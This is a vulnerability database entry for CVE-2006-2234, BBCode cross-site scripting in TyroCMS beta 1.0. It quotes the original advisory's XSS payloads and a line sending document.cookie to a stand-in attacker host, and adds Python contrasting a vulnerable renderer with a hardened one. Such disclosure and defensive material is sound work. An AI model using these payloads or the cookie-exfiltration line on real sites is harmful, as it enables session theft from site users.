TyroCMS Multiple Cross-Site Scripting (XSS) Vulnerabilities

Vulnerability ID: 1195111    Vulnerability type: Cross-site scripting
Published: 2006-05-05    Updated: 2006-05-05
CVE ID: CVE-2006-2234    CNNVD ID: CNNVD-200605-092
Platform: N/A    CVSS score: 6.8
|Vulnerability sources
https://www.securityfocus.com/bid/83922
https://cxsecurity.com/issue/WLB-2006050045
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-092
|Vulnerability details
TyroCMS beta 1.0 contains multiple cross-site scripting (XSS) vulnerabilities. A remote attacker can inject arbitrary web script or HTML via (1) a javascript: URI in the img BBCode tag, or (2) a JavaScript event handler in the url BBCode tag or (3) the color BBCode tag, because the tag arguments are placed into HTML attributes without validation or escaping.
|Vulnerability exploit (EXP)
TyroCms beta V1.0 multiple XSS injections

Discovered by: Nomenumbra

Date: 5/2/2006

Impact: moderate (privilege escalation, possible defacement)

TyroCMS is a PHP & MySql powered content management system(cms).

Includes built-in forums, powerful admin control panel, secure user system, and much more.

Easily manage the site through the admin panel even if you do not have great webmastering skills!

Due to the way BBcode is interpreted by TyroCms, it is possible to inject javascript in several statements like:

In images:

[img]javascript:alert('xss')[/img]

or in urls:

[url=x" onmouseover="alert('xss')]Site Name[/url]

or in colors:

[color=red" onmouseover="alert('xss')]lol[/color]

See? We could inject javascript like this:

javascript:window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)

to steal cookies.

Nomenumbra/[0x4F4C]
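The root cause described above is a BBCode-to-HTML converter that copies tag arguments straight into attribute values. The following is an added example, not TyroCMS code: a minimal converter in the vulnerable style next to a hardened one that escapes the whole input first and only emits a tag when the argument passes a strict whitelist (absolute http/https URLs for img/url, a CSS keyword or hex value for color). The sample inputs are constructed from the three tag shapes in the advisory.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample inputs: the three BBCode shapes the advisory describes.
SAMPLES = [
    "[img]javascript:alert('xss')[/img]",
    '[url=x" onmouseover="alert(\'xss\')]Site Name[/url]',
    '[color=red" onmouseover="alert(\'xss\')]lol[/color]',
]

IMG = re.compile(r"\[img\](.*?)\[/img\]")
URL = re.compile(r"\[url=(.*?)\](.*?)\[/url\]")
COLOR = re.compile(r"\[color=(.*?)\](.*?)\[/color\]")
# Whitelist for colors: a short CSS keyword or a 3/6-digit hex value, nothing else.
COLOR_VALUE = re.compile(r"^(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6})$")


def naive_render(text):
    """The vulnerable pattern: tag arguments are copied verbatim into HTML attributes."""
    text = IMG.sub(r'<img src="\1">', text)
    text = URL.sub(r'<a href="\1">\2</a>', text)
    return COLOR.sub(r'<span style="color:\1">\2</span>', text)


def is_http_url(value):
    """Accept only absolute http(s) URLs, so javascript: and scheme-less junk are rejected."""
    parts = urlsplit(value)
    return parts.scheme.lower() in ("http", "https") and bool(parts.netloc)


def safe_render(text):
    """Hardened: HTML-escape the whole input first, then emit a tag only when the
    argument passes the whitelist; otherwise the BBCode stays as literal text."""
    escaped = html.escape(text, quote=True)  # ", ', <, >, & are now inert

    def img(m):
        src = m.group(1).strip()
        return f'<img src="{src}">' if is_http_url(src) else m.group(0)

    def url(m):
        href = m.group(1).strip()
        return f'<a href="{href}">{m.group(2)}</a>' if is_http_url(href) else m.group(0)

    def color(m):
        value = m.group(1).strip()
        return f'<span style="color:{value}">{m.group(2)}</span>' if COLOR_VALUE.match(value) else m.group(0)

    return COLOR.sub(color, URL.sub(url, IMG.sub(img, escaped)))
```

Because escaping happens before tag matching, even an argument that passes the whitelist can no longer close the attribute or introduce a new one.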
|Affected products
Tyrocms Tyrocms Beta 1.0
|References

Source: BUGTRAQ
Name: 20060502 TyroCms beta V1.0 multiple XSS injections
Link: http://www.securityfocus.com/archive/1/archive/1/432730/100/0/threaded
Source: XF
Name: tyrocms-bbcode-xss(26222)
Link: http://xforce.iss.net/xforce/xfdb/26222
Source: SREASON
Name: 848
Link: http://securityreason.com/securityalert/848